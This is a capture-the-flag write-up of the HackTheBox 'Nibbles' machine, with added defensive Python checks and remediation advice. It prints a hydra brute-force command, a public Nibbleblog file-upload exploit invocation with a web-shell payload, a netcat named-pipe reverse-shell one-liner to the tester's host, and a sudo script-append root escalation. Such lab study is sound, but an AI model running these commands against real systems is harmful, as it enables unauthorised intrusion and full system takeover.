Nibbles HTB Writeup

Geranard
8 min read, Sep 21, 2023

Hello everyone. This time I want to share a writeup of Nibbles, a retired easy-difficulty box on HTB.

Nibbles information card

Enumeration

I start with nmap and rustscan.

Nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.75
Result:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Rustscan
Command: rustscan -a 10.10.10.75 -r 1-65535 --ulimit 5000 -- -A
Result:

[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.75:22
Open 10.10.10.75:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.75
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )

Both scans report ports 22 and 80 open; the web server on port 80 is the interesting one. Here is the content of 10.10.10.75 on port 80.

10.10.10.75 on port 80

Wappalyzer detects PHP, Apache HTTP Server, Ubuntu as the OS, RSS, and jQuery 2.1.0 as the JS library.

Viewing the page source, I find a /nibbleblog/ directory.

View page source of 10.10.10.75 on port 80

Here is the content of /nibbleblog/ directory.

Content of /nibbleblog/ directory in 10.10.10.75 on port 80

While enumerating the site, I set up two DirBuster instances to do directory busting.

Command: dirbuster
Target: http://10.10.10.75:80
Threads: 100 each
Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Dir to start with: / and /nibbleblog
File extension: php,txt,sql,sh
Use blank extension: true

I set the extensions to php,txt,sql,sh because the site runs on PHP and the host is Ubuntu. The txt and sql extensions are just in case.

Dirbuster settings

I leave them running for a while and proceed with enumerating the site. The website states that it uses Nibbleblog as its Content Management System (CMS).

I find nothing inside the website. All of the clickable links lead to “There are no posts” pages with more or less the same URL structure: url/nibbleblog/index.php?controller=blog&action=view&category={category}.

I run nikto to see if it finds anything while DirBuster is still running.

Command: nikto -url http://10.10.10.75/nibbleblog
Result:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.75
+ Target Hostname: 10.10.10.75
+ Target Port: 80
+ Start Time: 2023-09-21
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /nibbleblog/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /nibbleblog/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /nibbleblog/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /nibbleblog/admin/: Directory indexing found.
+ /nibbleblog/admin.php: This might be interesting.
+ /nibbleblog/admin/: This might be interesting.
+ /nibbleblog/README: README file found.
+ /nibbleblog/install.php: install.php file found.
+ /nibbleblog/LICENSE.txt: License file found may identify site software.
+ 8049 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-09-21 (2517 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
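A defender-side check for the header issues nikto lists above (missing X-Frame-Options, missing X-Content-Type-Options, PHPSESSID without HttpOnly, and the version string in the Server header), written as an added example for this writeup, not part of the original post. Both responses are constructed to mirror the findings; they are not captures from the box.

```python
import re

# Constructed response modelled on nikto's findings above (not a real capture from the box).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "Set-Cookie: PHPSESSID=constructedsessionvalue; path=/\r\n"
    "\r\n"
)
# The same response after the fixes a hardened Apache/PHP setup would apply (also constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Set-Cookie: PHPSESSID=constructedsessionvalue; path=/; HttpOnly; SameSite=Lax\r\n"
    "\r\n"
)

def parse_headers(raw):
    """Return [(name_lower, value)] from a raw HTTP response; repeated headers are kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:       # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers

def check_security_headers(raw):
    """List the weaknesses nikto flagged on /nibbleblog/, plus version leakage in Server."""
    headers = parse_headers(raw)
    values = lambda n: [v for k, v in headers if k == n]
    findings = []
    csp_frames = any("frame-ancestors" in v.lower() for v in values("content-security-policy"))
    if not values("x-frame-options") and not csp_frames:
        findings.append("clickjacking: no X-Frame-Options or CSP frame-ancestors")
    if not any(v.lower() == "nosniff" for v in values("x-content-type-options")):
        findings.append("MIME sniffing: X-Content-Type-Options is not nosniff")
    for cookie in values("set-cookie"):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {name} is readable by JavaScript (no HttpOnly)")
    for server in values("server"):
        if re.search(r"/\d", server):          # e.g. "Apache/2.4.18 (Ubuntu)"
            findings.append(f"version disclosure in Server header: {server}")
    return findings
```

Feed it the raw response from `curl -i` (or a Burp capture) to re-check a host after applying the fixes.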

Looking back at DirBuster, a directory at /nibbleblog/admin was found, so I try to access it to see what it’s about.

Content of /nibbleblog/admin

After crawling around, I find that there is source code lying around and that DirBuster found a lot of interesting subdirectories. I decide to go through the DirBuster results first.

Dirbuster’s result

The first one to catch my eye is /nibbleblog/admin.php.

Content of admin.php

Here is what I try on admin.php:

  • Some default credentials such as admin:admin, admin:123456, admin:Admin1234, etc. They didn’t work.
  • There’s a forgot-password function, but based on the error message it has issues sending mail.
  • SQL injection payloads such as ‘ “ ; -- # hit blacklist protection.
  • Nikto found CVE-2006-5412, which leads to this exploit-db article. The article says the exploit works on 4.4.0 and 4.4.1, and earlier versions might be affected too. So I give it a try by changing the “en_log_id” parameter’s value from 0 to true. It doesn’t work.

I think there are several more things I could try here, but I decide to move forward first.

DirBuster found install.php. It contains only one sentence, “Blog already installed… May be you want to update?”, with “update” linked (an <a> tag) to update.php.

Content of install.php

After clicking “update”, I get redirected to update.php, which reports that the config DB, comments DB, and categories were updated and that Nibbleblog version 4.0.3 “Coffee” is in use.

Content of update.php

I find /content/private/config.xml and comments.xml and open them. There is an email address in there.

Gaining Foothold

The administrator’s username might be “admin”, judging from the email above. So I brute-force credentials with hydra. Here is a website that explains hydra’s parameters. I run it and set it aside.

Command: sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 10.10.10.75 http-post-form "/admin.php?controller=user&action=login:username=admin&password=^PASS^:Incorrect username or password"

There are multiple ways to brute-force a password: ffuf, Burp Suite (which might crash with rockyou.txt), or my own script.

I might use ffuf as a fallback. This link might be a good source to see how it works. Don’t forget to quote the URL so the shell doesn’t send ffuf to the background when the URL contains an ampersand.

Command: ffuf -request request.txt -request-proto http -mode pitchfork -w /usr/share/wordlists/rockyou.txt:PASSFUZZ -fs 48,1541

I filter by response length so the shell isn’t flooded with all the 200 responses. It seems there is blacklist protection, which means I can’t brute-force; I should have used a rate limit.

I head to the internet to search for Nibbleblog 4.0.3 vulnerabilities and find the arbitrary file upload vulnerability. Here are some of the sources I read: github, exploit-db, and rapid7.

According to the github repo a username and password are needed, and I don’t have either. Still, giving it a try doesn’t hurt, so I clone the repo and run it as instructed.

Command: 
git clone https://github.com/dix0nym/CVE-2015-6967.git
cd CVE-2015-6967
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php

Except that I don’t have a shell.php. So I download p0wny-shell and use it as the payload.

Attack result

I didn’t expect it to work, but I try logging in with the admin:nibbles credentials. And it works.

Nibbleblog admin page

Now all that’s left is to find where the shell was uploaded. Based on the exploit code, it is uploaded through the my_image plugin and can be reached at /nibbleblog/content/private/plugins/my_image/image.php.

p0wny-shell successfully uploaded

And with that, I get user.txt.

Content of user.txt

Privilege Escalation

I use netcat to get a reverse shell because it is more responsive.

Command: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1337 >/tmp/f

There is a personal.zip in /home/nibbler which might be interesting. But the first thing I usually do after getting a user shell is check what privileges I have and what I can run.

Command: sudo -l
Result:
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

It seems that I can run monitor.sh, which is inside personal.zip; that is why the file is there. I unzip it first with the “unzip personal.zip” command.

nibbler has write access to monitor.sh, which means I can use it with sudo.

Content of /personal/stuff and permission of monitor.sh

This is the command I use to append “sudo su” to monitor.sh.

Command: echo 'sudo su' >> monitor.sh

Then I run “sudo ./monitor.sh”.
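The root cause of this escalation is a sudo rule that points at a script the invoking user can edit. As an added example (not from the original post), this Python audit parses `sudo -l` output like the one above and flags every command path the given user can modify, including the case where the target is missing but its directory is writable. The `demo()` function recreates the /home/nibbler/personal/stuff/monitor.sh layout in a temporary directory so the check runs offline; the uid 424242 is a constructed unrelated user.

```python
import os
import re
import stat
import tempfile

# Constructed `sudo -l` output modelled on the writeup's; {script} is filled at runtime.
SUDO_L_TEMPLATE = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: {script}
"""
# "(root) NOPASSWD: /path" -> runas user, tag list, absolute command path
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")

def parse_sudo_l(text):
    """Return (runas, tags, command_path) for each command entry in `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group("runas"), m.group("tags").replace(":", " ").split(), m.group("cmd")))
    return entries

def _mode_allows_write(st, uid, gids):
    return bool((st.st_uid == uid and st.st_mode & stat.S_IWUSR)
                or (st.st_gid in gids and st.st_mode & stat.S_IWGRP)
                or st.st_mode & stat.S_IWOTH)

def writable_by(path, uid, gids):
    """True if uid can edit `path`, or replace it because its directory is writable."""
    try:
        if _mode_allows_write(os.stat(path), uid, gids):
            return True
    except FileNotFoundError:
        pass  # a missing target is still a problem if the directory is writable
    return _mode_allows_write(os.stat(os.path.dirname(path)), uid, gids)

def audit(sudo_l_text, uid, gids):
    """Command paths from `sudo -l` that the given user can modify: root is one edit away."""
    return [cmd for _, _, cmd in parse_sudo_l(sudo_l_text) if writable_by(cmd, uid, gids)]

def demo():
    """Recreate the box's layout in a temp dir; audit as the owner and as an unrelated uid."""
    with tempfile.TemporaryDirectory() as home:
        stuff = os.path.join(home, "personal", "stuff")
        os.makedirs(stuff, mode=0o755)
        script = os.path.join(stuff, "monitor.sh")
        open(script, "w").close()  # empty file stands in for monitor.sh
        os.chmod(script, 0o775)  # owner/group writable, as on the box
        text = SUDO_L_TEMPLATE.format(script=script)
        me, my_gids = os.getuid(), set(os.getgroups()) | {os.getgid()}
        return audit(text, me, my_gids) == [script], audit(text, 424242, {424242}) == []
```

The fix on a real host is to make such scripts root-owned and not group- or world-writable (and to keep their directory the same), so that `audit()` returns nothing for the sudo user.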

Summary

There are several vulnerabilities here, such as:

  • Outdated version of Nibbleblog.
  • Source code disclosure and sensitive data exposure through directory listing (/nibbleblog/admin).
  • Weak password policy (admin:nibbles).
  • Arbitrary file upload (CVE-2015-6967).
  • No access/permission control protecting the file (/personal/stuff/monitor.sh).

Remediation I would suggest:

  • Update Nibbleblog or move to a newer CMS.
  • Hide or move the /nibbleblog/admin directory.
  • Use stronger passwords.
  • Don’t use outdated plugins.
  • Fix the file permissions.

What didn’t work for me:

  • SQLi on the admin login page
  • Brute-forcing creds on the admin login page using hydra (error) and ffuf (blocked by Nibbleblog)

It is possible that this machine has other vulnerabilities, such as SQLi, XSS, etc. Please let me know if you have any recommendations, criticism, or something I might have missed on this box. That’s all folks. Thanks for reading.
